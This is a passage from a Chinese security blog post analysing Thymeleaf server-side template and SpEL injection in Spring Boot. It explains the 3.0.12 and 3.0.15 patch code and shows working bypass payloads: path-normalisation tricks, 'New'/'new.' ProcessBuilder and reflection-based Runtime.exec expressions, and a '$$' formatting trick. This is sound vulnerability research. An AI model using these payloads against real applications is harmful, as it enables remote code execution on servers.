== <span class="keyword">null</span>) &#123;</span><br><span class="line">                    <span class="keyword">return</span> <span class="keyword">null</span>;</span><br><span class="line">                &#125;</span><br><span class="line">                <span class="keyword">final</span> Object result = expression.execute(context, StandardExpressionExecutionContext.RESTRICTED);<span class="comment">//执行spel运算         </span></span><br></pre></td></tr></table></figure>
<p>虽然有很多代码没看太明白，但是简单来说就是当传入的模板名中包含<code>::</code>.就会将<code>__</code>包裹的部分当作spel表达式执行</p>
<h4 id="鸡肋的回显"><a href="#鸡肋的回显" class="headerlink" title="鸡肋的回显"></a>鸡肋的回显</h4><p>将 :: 左右分隔成两部分, 即 templateNameStr 和 fragmentSpecStr, 如果 fragmentSpecStr 为空则返回 null，不为空就会根据模板名去寻找片段，如果模板名不存在就会报错出来，所以一些payload会在::后加一些内容使片段名不为空，从而可以回显<br>报错位置在<code>org/thymeleaf/engine/TemplateManager#resolveTemplate</code></p>
<p>在低版本的 springboot (&lt;= 2.2) 中, server.error.include-message 的默认值为 always, 这使得默认的 500 页面会显示异常信息<br>但是在高版本的 springboot (&gt;= 2.3) 中, 上述选项的默认值变成了 never, 那么 500 页面就不会显示任何异常信息</p>
<p>不同版本的SpringBoot所自带的Thymeleaf的版本<br>SpringBoot     Thymeleaf<br>2.2.0.RELEASE  3.0.11<br>2.4.10         3.0.12<br>2.7.18         3.0.15<br>3.0.8          3.1.1<br>3.2.2          3.1.2</p>
<h3 id="补丁绕过"><a href="#补丁绕过" class="headerlink" title="补丁绕过"></a>补丁绕过</h3><h4 id="3-0-12"><a href="#3-0-12" class="headerlink" title="3.0.12"></a>3.0.12</h4><p>在 3.0.12 版本中， Thymeleaf 在 util 目录下增加了 SpringRequestUtils 和 SpringStandardExpressionUtils 两个类。<br>其实就是写了两个补丁，封装成两个类，每个类都有一个方法，把这俩个方法加到代码流程中</p>
<h5 id="SpringRequestUtils-checkViewNameNotInRequest"><a href="#SpringRequestUtils-checkViewNameNotInRequest" class="headerlink" title="SpringRequestUtils#checkViewNameNotInRequest"></a>SpringRequestUtils#checkViewNameNotInRequest</h5><p>该方法放到最前面，当检测到<code>::</code>时触发</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">checkViewNameNotInRequest</span><span class="params">(<span class="keyword">final</span> String viewName, <span class="keyword">final</span> HttpServletRequest request)</span> </span>&#123;</span><br><span class="line">       <span class="keyword">final</span> String vn = StringUtils.pack(viewName);<span class="comment">//StringUtils.pack() 的作用是去掉字符串的空格和 ASCII 码在空格之前的特殊字符，并最后转为小写</span></span><br><span class="line">       <span class="keyword">final</span> String requestURI = StringUtils.pack(UriEscape.unescapeUriPath(request.getRequestURI()));</span><br><span class="line"></span><br><span class="line">       <span class="keyword">boolean</span> found = (requestURI != <span class="keyword">null</span> &amp;&amp; requestURI.contains(vn));<span class="comment">//如果路径里包含模板则报错</span></span><br><span class="line">       <span class="keyword">if</span> (!found) &#123;</span><br><span class="line">           <span class="keyword">final</span> Enumeration&lt;String&gt; paramNames = request.getParameterNames();</span><br><span class="line">           String[] paramValues;</span><br><span class="line">           String paramValue;</span><br><span class="line">           <span class="keyword">while</span> (!found &amp;&amp; paramNames.hasMoreElements()) &#123;</span><br><span class="line">               paramValues = request.getParameterValues(paramNames.nextElement());</span><br><span class="line">               <span class="keyword">for</span> (<span class="keyword">int</span> i = <span class="number">0</span>; !found &amp;&amp; i &lt; paramValues.length; i++) &#123;</span><br><span class="line">                   paramValue = StringUtils.pack(UriEscape.unescapeUriQueryParam(paramValues[i]));</span><br><span class="line">                   <span class="keyword">if</span> (paramValue.contains(vn)) &#123;<span class="comment">//如果传参包含模板名就会报错</span></span><br><span class="line">                       found = <span class="keyword">true</span>;</span><br><span class="line">                   &#125;</span><br><span class="line">               &#125;</span><br><span class="line">           &#125;</span><br><span class="line">       &#125;</span><br><span class="line">       <span class="keyword">if</span> (found) &#123;</span><br><span class="line">           <span class="keyword">throw</span> <span class="keyword">new</span> TemplateProcessingException(</span><br><span class="line">                   <span class="string">&quot;View name is an executable expression, and it is present in a literal manner in &quot;</span> +</span><br><span class="line">                   <span class="string">&quot;request path or parameters, which is forbidden for security reasons.&quot;</span>);</span><br><span class="line">       &#125;</span><br></pre></td></tr></table></figure>
<p>关于该方法的绕过也分为两种<br>第一种是return内容可控</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">@Controller</span></span><br><span class="line">publicclassThymeleafDemoController&#123;</span><br><span class="line">    <span class="meta">@GetMapping(&quot;/path&quot;)</span></span><br><span class="line">    <span class="function">publicString <span class="title">path</span><span class="params">(String path)</span></span>&#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="string">&quot;user/&quot;</span>+ path +<span class="string">&quot;/welcome&quot;</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">//直接return参数</span></span><br><span class="line"><span class="meta">@Controller</span></span><br><span class="line">publicclassThymeleafDemoController&#123;</span><br><span class="line">    <span class="meta">@GetMapping(&quot;/path&quot;)</span></span><br><span class="line">    <span class="function">publicString <span class="title">path</span><span class="params">(String path)</span></span>&#123;</span><br><span class="line">        <span class="keyword">return</span>  path;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>关于上述两段代码<br>第一段代码，传入的模板名为<code>user/传入参数/welcome</code>，传入参数不包含模板名（其实包含关系应该反过来就好了，也有可能是为了不影响正常功能），直接通过<br>第二段代码，直接return参数时，参数和模板名完全相等，直接报错<br>也就是说该补丁会导致直接return参数的情况下代码报错</p>
<p>第二种URL路径可控<br>上述代码的<code>request.getRequestURI()</code>获取到的路由是原生没有进行规范的路由<br>而传入的模板名是经过tomcat路由规范后的结果,利用这个差异我们就可以进行绕过<br>传入</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">/ThymeleafUri;/__$</span><br><span class="line">/ThymeleafUri//__$</span><br><span class="line">/ThymeleafUri/;/__$</span><br></pre></td></tr></table></figure>
<p>获取到的模板名为<code>ThymeleafUri/__$</code></p>
<h5 id="SpringStandardExpressionUtils-containsSpELInstantiationOrStatic"><a href="#SpringStandardExpressionUtils-containsSpELInstantiationOrStatic" class="headerlink" title="SpringStandardExpressionUtils#containsSpELInstantiationOrStatic"></a>SpringStandardExpressionUtils#containsSpELInstantiationOrStatic</h5><p>该方法放到最后，解析spel表达式时触发</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br></pre></td><td class="code"><pre><span class="line"> <span class="keyword">private</span> <span class="keyword">static</span> <span class="keyword">final</span> <span class="keyword">char</span>[] NEW_ARRAY = <span class="string">&quot;wen&quot;</span>.toCharArray(); <span class="comment">// Inverted &quot;new&quot;</span></span><br><span class="line"> <span class="keyword">private</span> <span class="keyword">static</span> <span class="keyword">final</span> <span class="keyword">int</span> NEW_LEN = NEW_ARRAY.length;</span><br><span class="line"><span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">boolean</span> <span class="title">containsSpELInstantiationOrStatic</span><span class="params">(<span class="keyword">final</span> String expression)</span> </span>&#123;</span><br><span class="line">    <span class="keyword">final</span> <span class="keyword">int</span> explen = expression.length(); <span class="comment">// 表达式总长度</span></span><br><span class="line">    <span class="keyword">int</span> n = explen; <span class="comment">// 从字符串末尾开始扫描（倒序扫描）</span></span><br><span class="line">    <span class="keyword">int</span> ni = <span class="number">0</span>; <span class="comment">// 用于匹配 &quot;new&quot; 关键字的索引（状态机计数器）</span></span><br><span class="line">    <span class="keyword">int</span> si = -<span class="number">1</span>; <span class="comment">// 用于记录 &#x27;)&#x27; 的位置，用于匹配 T(...) 结构</span></span><br><span class="line">    <span class="keyword">char</span> c; <span class="comment">// 当前扫描字符</span></span><br><span class="line">    <span class="keyword">while</span> (n-- != <span class="number">0</span>) &#123; <span class="comment">// 从后往前遍历字符串</span></span><br><span class="line">        c = expression.charAt(n); <span class="comment">// 当前字符</span></span><br><span class="line">        <span class="keyword">if</span> (ni &lt; NEW_LEN</span><br><span class="line">                &amp;&amp; c == NEW_ARRAY[ni]</span><br><span class="line">                &amp;&amp; (ni &gt; <span class="number">0</span> || ((n + <span class="number">1</span> &lt; explen) &amp;&amp; Character.isWhitespace(expression.charAt(n + <span class="number">1</span>))))) &#123;<span class="comment">//判断一个字符是否属于“空白字符</span></span><br><span class="line">            ni++;</span><br><span class="line">            <span class="keyword">if</span> (ni == NEW_LEN &amp;&amp; (n == <span class="number">0</span> || !Character.isJavaIdentifierPart(expression.charAt(n - <span class="number">1</span>)))) &#123;<span class="comment">//判断一个字符是否可以作为 Java 变量名的一部分</span></span><br><span class="line">                <span class="keyword">return</span> <span class="keyword">true</span>; <span class="comment">// 即判断表达式开头是否为new</span></span><br><span class="line">            &#125;</span><br><span class="line">            <span class="keyword">continue</span>; <span class="comment">// 继续匹配下一个字符</span></span><br><span class="line">        &#125;</span><br><span class="line">        <span class="comment">// 重置匹配状态</span></span><br><span class="line">        <span class="keyword">if</span> (ni &gt; <span class="number">0</span>) &#123;</span><br><span class="line">            n += ni; </span><br><span class="line">            ni = <span class="number">0</span>; </span><br><span class="line">            <span class="keyword">if</span> (si &lt; n) &#123;</span><br><span class="line">                si = -<span class="number">1</span>;</span><br><span class="line">            &#125;</span><br><span class="line"></span><br><span class="line">            <span class="keyword">continue</span>;</span><br><span class="line">        &#125;</span><br><span class="line">        ni = <span class="number">0</span>; </span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span> (c == <span class="string">&#x27;)&#x27;</span>) &#123;</span><br><span class="line">            si = n;</span><br><span class="line">        &#125; <span class="keyword">else</span> <span class="keyword">if</span> (si &gt; n &amp;&amp; c == <span class="string">&#x27;(&#x27;</span></span><br><span class="line">                &amp;&amp; ((n - <span class="number">1</span> &gt;= <span class="number">0</span>) &amp;&amp; (expression.charAt(n - <span class="number">1</span>) == <span class="string">&#x27;T&#x27;</span>))</span><br><span class="line">                &amp;&amp; ((n - <span class="number">1</span> == <span class="number">0</span>) || !Character.isJavaIdentifierPart(expression.charAt(n - <span class="number">2</span>)))) &#123;</span><br><span class="line"></span><br><span class="line">            <span class="keyword">return</span> <span class="keyword">true</span>; <span class="comment">// 发现存在T(...) 这样的格式开头</span></span><br><span class="line"></span><br><span class="line">        &#125; <span class="keyword">else</span> <span class="keyword">if</span> (si &gt; n &amp;&amp; !(Character.isJavaIdentifierPart(c) || c == <span class="string">&#x27;.&#x27;</span>)) &#123;</span><br><span class="line">            si = -<span class="number">1</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> <span class="keyword">false</span>; <span class="comment">// 没检测到危险模式</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>上述代码即检测spel表达式是否存在<code>new加空格</code>或者<code>T(...)</code> 这样的格式</p>
<p>绕过new限制<br>使用<br><code>$&#123;New java.lang.ProcessBuilder(&#39;bash&#39;,&#39;-c&#39;,&#39;open -a Calculator&#39;).start()&#125;</code><br><code>$&#123;new.java.lang.ProcessBuilder(&#39;bash&#39;,&#39;-c&#39;,&#39;open -a Calculator&#39;).start()&#125;</code></p>
<p>绕过T限制<br><code>T</code>和<code>(</code>中间添加%20(空格)、%0a(换行)、%09(制表符)等等进行绕过</p>
<p>或者使用反射调用<br><code>path=__$&#123;&#39;&#39;.getClass().forName(&#39;java.lang.Runtime&#39;).getMethod(&#39;exec&#39;,&#39;&#39;.getClass()).invoke(&#39;&#39;.getClass().forName(&#39;java.lang.Runtime&#39;).getMethod(&#39;getRuntime&#39;).invoke(null),&#39;open -a calculator.app&#39;)&#125;__::</code></p>
<h4 id="3-0-15"><a href="#3-0-15" class="headerlink" title="3.0.15"></a>3.0.15</h4><p>Thymeleaf 3.0.14 没有对应的 Spring Boot 官方版本，只能手动引入使用，并且14和15版本补丁相差不大，这里就不再单独分析3.0.14版本的补丁，直接对3.0.15版本补丁进行分析</p>
<h5 id="SpringRequestUtils-containsExpression"><a href="#SpringRequestUtils-containsExpression" class="headerlink" title="SpringRequestUtils#containsExpression"></a>SpringRequestUtils#containsExpression</h5><p>Thymeleaf3.0.15版本对checkViewNameNotInRequest()函数也进行了完善<br>在当前类中添加了一个检测函数containsExpression对传入的模板名，路径，参数值进行检测</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">private</span> <span class="keyword">static</span> <span class="keyword">boolean</span> <span class="title">containsExpression</span><span class="params">(String text)</span> </span>&#123;</span><br><span class="line">    <span class="keyword">int</span> textLen = text.length();<span class="comment">// 获取字符串长度</span></span><br><span class="line">    <span class="keyword">boolean</span> expInit = <span class="keyword">false</span>;</span><br><span class="line">    <span class="keyword">for</span>(<span class="keyword">int</span> i = <span class="number">0</span>; i &lt; textLen; ++i) &#123;</span><br><span class="line">        <span class="keyword">char</span> c = text.charAt(i);<span class="comment">// 取当前字符</span></span><br><span class="line">        <span class="keyword">if</span> (!expInit) &#123;</span><br><span class="line">            <span class="keyword">if</span> (c == <span class="string">&#x27;$&#x27;</span> || c == <span class="string">&#x27;*&#x27;</span> || c == <span class="string">&#x27;#&#x27;</span> || c == <span class="string">&#x27;@&#x27;</span> || c == <span class="string">&#x27;~&#x27;</span>) &#123; <span class="comment">// 如果遇到表达式起始符（五种之一）</span></span><br><span class="line">                expInit = <span class="keyword">true</span>;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">            <span class="keyword">if</span> (c == <span class="string">&#x27;&#123;&#x27;</span>) &#123;<span class="comment">// 如果紧接着遇到 &#x27;&#123;&#x27;</span></span><br><span class="line">                <span class="keyword">return</span> <span class="keyword">true</span>;  <span class="comment">// 说明命中表达式模式：$&#123;  *&#123;  #&#123;  @&#123;  ~&#123;</span></span><br><span class="line">            &#125;</span><br><span class="line">            <span class="keyword">if</span> (!Character.isWhitespace(c)) &#123;<span class="comment">// 如果不是空白字符（空格、换行、tab等）</span></span><br><span class="line">                expInit = <span class="keyword">false</span>;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> <span class="keyword">false</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>就是检测thymeleaf 表达式,当检测到<code>$</code>后，查看后面紧跟的是不是<code>&#123;</code>，或者<code>空白字符&#123;</code>。好像thymeleaf的作者不太喜欢写正则呀，写的补丁都是状态机</p>
<p>绕过方法也是很巧妙的<br><code>__|$$&#123;#response.addHeader(&quot;x-cmd&quot;,&quot;n4c1&quot;)&#125;|__</code><br>使用格式化字符拼接，构造出<code>$$&#123;&#125;</code><br>而该FSM（有限状态机）不同于正则是”滑动窗口匹配”而是”单路径匹配”,无回溯功能，导致第二个$被当成普通字符处理掉了</p>
<h5 id="SpringStandardExpressionUtils-isPreviousStaticMarker"><a href="#SpringStandardExpressionUtils-isPreviousStaticMarker" class="headerlink" title="SpringStandardExpressionUtils#isPreviousStaticMarker"></a>SpringStandardExpressionUtils#isPreviousStaticMarker</h5><p>对containsSpELInstantiationOrStatic()函数检测进行了完善<br>对T和()中间空字符进行绕过修复</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">private</span> <span class="keyword">static</span> <span class="keyword">boolean</span> <span class="title">isPreviousStaticMarker</span><span class="params">(<span class="keyword">final</span> String expression, <span class="keyword">final</span> <span class="keyword">int</span> idx)</span> </span>&#123;</span><br><span class="line">       <span class="keyword">char</span> c,c1;</span><br><span class="line">       <span class="keyword">int</span> n = idx;</span><br><span class="line">       <span class="keyword">while</span> (n-- != <span class="number">0</span>) &#123;</span><br><span class="line">           c = expression.charAt(n);</span><br><span class="line">           <span class="keyword">if</span> (c == <span class="string">&#x27;T&#x27;</span>) &#123;</span><br><span class="line">               <span class="keyword">if</span> (n == <span class="number">0</span>) &#123;</span><br><span class="line">                   <span class="keyword">return</span> <span class="keyword">true</span>;</span><br><span class="line">               &#125;</span><br><span class="line">               c1 = expression.charAt(n - <span class="number">1</span>);</span><br><span class="line">               <span class="keyword">return</span> !isSafeIdentifierChar(c1);</span><br><span class="line">           &#125; <span class="keyword">else</span> <span class="keyword">if</span> (!Character.isWhitespace(c)) &#123;</span><br><span class="line">               <span class="keyword">return</span> <span class="keyword">false</span>;</span><br><span class="line">           &#125;</span><br><span class="line">       &#125;</span><br><span class="line">       <span class="keyword">return</span> <span class="keyword">false</span>;</span><br><span class="line">   &#125;</span><br></pre></td></tr></table></figure>
<p>所以使用T%20()的方式调用类绕不过去了</p>

        </div>

        
        <section class="post-tags">
            <div>
                <span>Tag(s):</span>
                <span class="tag">
                    
                    
                        <a href="/tags/%E8%A1%A8%E8%BE%BE%E5%BC%8F%E6%B3%A8%E5%85%A5/"># 表达式注入</a>
                    
                        
                </span>
            </div>
            <div>
                <a href="javascript:window.history.back();">back</a>
                <span>· </span>
                <a href="/">home</a>
            </div>
        </section>
        <section class="post-nav">
            
            
            <a class="next" rel="next" href="/2026/02/02/file/webshell%E6%B5%81%E9%87%8F%E5%88%86%E6%9E%90/">webshell流量分析</a>
            
        </section>


    </article>
</div>

            </div>
            <footer id="footer" class="footer">
    <div class="copyright">
        <span>© mayylu | Powered by <a href="https://hexo.io" target="_blank">Hexo</a> & <a href="https://github.com/Siricee/hexo-theme-Chic" target="_blank">Chic</a></span>
    </div>
</footer>

    </div>
</body>

</html>